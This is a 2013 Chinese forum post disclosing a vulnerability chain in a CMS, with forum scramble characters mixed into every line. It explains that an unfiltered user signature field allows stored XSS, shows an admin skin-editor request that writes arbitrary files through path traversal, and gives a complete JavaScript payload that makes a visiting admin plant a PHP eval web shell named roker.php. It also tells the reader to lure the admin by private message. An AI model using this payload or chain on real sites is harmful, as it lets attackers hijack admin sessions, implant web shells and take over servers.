|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题4 m8 ]1 I# V( T) A, a/ h
官网已经修补了,所以重新下了源码
: F7 u& m/ [" l因为 后台登入 还需要认证码 所以 注入就没看了。
3 F& R! U/ P) M& _! O& }存在 xss
) K" U+ S" G, W( H# ^: X/ u漏洞文件 user/member/skin_edit.php
4 c2 q% o8 _5 O, J( S1 }" t) t本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
( j; q" D: U: Q, y
Z: y! y: v# [</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
9 S }3 q8 D4 T % y2 v9 B- N# E T b
</textarea></td></tr>& t' F- b: o9 A5 n/ Q P
6 X3 B/ @% z) v% ?
user/do.php
. {: y1 i! v/ y W+ S; ]# s+ G4 _3 W
. R- \" t6 k& y1 C; T- q+ ]6 v
if($op=='zl'){ //资料+ I3 y' t" V# i, s+ A: k
! m8 a1 ^3 I# G
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) , Z8 l2 A, \1 Q" h) k
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
' k% w4 @. s7 `2 \ 3 S/ @, I" \) S0 n& M& |
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."'," S2 s0 }5 A A+ t3 ~" g
& [- l9 F6 e) P/ j CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ ^/ a9 S; w: F& k% H5 v
where CS_Name='".$cscms_name."'";+ }) J- v" r# y6 H5 Z3 V2 ^1 t
9 `2 v0 ~* H }3 P, F( {5 {
if($db->query($sql)){
- E9 H: @5 L# y# n: y + g% x4 N7 N% o+ U; |! j
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));" p) j8 R, P# [# D
' V) h) l6 F+ B. h; M4 V }else{
" ^( r ?8 X9 _9 N' M4 }) g: @ L1 l$ H1 a, h6 [
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));9 Z8 X, [- }5 H6 A
8 Q, ?" C( u1 M! {7 s }
' K7 O. l2 u" E2 U9 q/ K$ U# p0 E: `( X. p
+ i/ S7 @; U4 k% M
没有 过滤导致xss产生。
/ Q, h8 i5 [ w后台 看了下 很奇葩的是可以写任意格式文件。。& I( k: ?0 ?4 u0 f" B
抓包。。
' _0 d. l7 G/ Z
* v: x6 T6 t: U/ h. E
% ]6 o2 z$ Q" \" `/ Y本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
0 `5 n2 C5 s2 M) K( y [0 F) b, X0 P5 C" X w0 b
Accept: text/html, application/xhtml+xml, */*
0 p; x' \3 H1 W: z3 A 9 M; T) Q9 G$ y9 q" m$ a3 f
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
7 M3 h' S: a* P X' V9 { 4 Q. N I6 i7 u( Y! u, r! g1 ]
Accept-Language: zh-CN( |. M" O2 N7 {9 [1 l8 }6 d1 c' j
3 M! z! s) `& W1 c3 _8 _) U! KUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)$ `5 O; Y! G# J* q6 a) @- C
9 w$ m! B5 Y3 P2 J( }Content-Type: application/x-www-form-urlencoded
9 B# W* v8 k! |. X6 i* x / w9 ?1 A2 l5 _
Accept-Encoding: gzip, deflate* h- y! C' K2 Y3 ^* x
+ J, B3 Z, c- n9 S2 a, [
Host: 127.0.0.1
" o( E8 s* x0 Q: p' f7 ^6 C+ V, h' m
$ T* V B* M6 s% gContent-Length: 38
. o* K5 X. c% [7 a, T5 n7 f. F
1 z* y. c: K$ v9 \0 M- C" _# zDNT: 1
* K! L+ m! }4 ~ + l; ?* a" V/ Z5 n4 s; y
Connection: Keep-Alive1 u! \- W2 `; s. D7 a+ U
( U4 U# t' I$ L+ ^; T
Cache-Control: no-cache3 C! H& B. @+ a) o
( C: {( T- L' w9 r4 }; q- B
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
- J+ F" q3 x, f4 i% |" G. ? 7 g/ q# d9 o' J. f; c; ]
) m9 G8 C4 c& V2 p$ K Z3 p# l3 S
name=aaa.php&content=%3Cs%3E%3Ca%25%3E% s E) L# b- W# Q, N& K) j# o
: O+ W- ?0 o4 t6 W& S/ E1 N* C6 m1 t, f9 D8 ~' J) I0 n
& l f6 s0 F- ?5 J8 d1 H
于是 构造js如下。
6 s9 C# B& A. S+ E. l, F8 w5 a, t3 M( W& X
本帖隐藏的内容<script> % R) m8 i4 \# @( d
thisTHost = top.location.hostname;
- m) _/ J, T- z# n
7 c9 J$ I, {. g5 R5 d: E# \thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
7 h1 G0 S5 F: a
/ r0 h( U* B1 O# B9 Efunction PostSubmit(url, data, msg) { 8 P h% q1 K. i4 Z
var postUrl = url;
- _2 |3 j0 P+ k: G6 G 1 H0 K- ~% E4 v" ~, a4 w, ^' P/ Z
var postData = data; - H5 x6 S1 `4 M% V" H
var msgData = msg; , @% G- v: n, d7 ]
var ExportForm = document.createElement("FORM");
I% [+ a, @' ] ~; V( \ document.body.appendChild(ExportForm);
& m: ~& Y! ]" | M+ O/ h, i ExportForm.method = "POST";
+ ~$ c' @+ u" U# l4 {& L+ u var newElement = document.createElement("input"); - Q) d3 e: w4 Q6 p; ~+ D' m, v
newElement.setAttribute("name", "name");
$ k; V. i7 A5 l- ^% @ newElement.setAttribute("type", "hidden"); , @5 h# ?9 \+ y4 i3 x
var newElement2 = document.createElement("input");
\: e0 K9 N. ]# E/ w6 {1 b0 `. v newElement2.setAttribute("name", "content"); & w8 n, u; s8 D! ]: ]4 m
newElement2.setAttribute("type", "hidden"); ' m: y/ V' Z# M4 @9 d k" S. {7 ?8 ~
ExportForm.appendChild(newElement);
; K0 v ]6 m$ @ ExportForm.appendChild(newElement2); . i: \' E r- p1 r5 P7 B4 O
newElement.value = postData;
% Z( y# Q6 W0 r7 s! T) ` newElement2.value = msgData;
: Z3 ~) ~4 Q$ m |/ [ ExportForm.action = postUrl; 5 }6 {* s$ W$ o& `# I7 m( i
ExportForm.submit(); ! G5 r6 j6 y& o& x* {. M
};) F9 [5 i% q1 t z) u/ R7 ]! F
# J& h7 R+ Y O5 q& v" B# U8 Y& _! t# fPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
3 {, T: ?3 n' d6 r( [1 p/ |! r
1 w6 D- C. v* d3 Z6 I% h- i2 K6 @</script>) W% o' i5 c/ a
0 k# o! T1 o6 V' n H* n) n- ]8 }
4 ^: E U8 M1 q# n% J$ a q
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
" X5 B! m& \' l Z$ S$ i. e& Z用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
& G! H# B0 S9 c5 f: e/ X$ j就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
8 s! H% w5 D; \
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对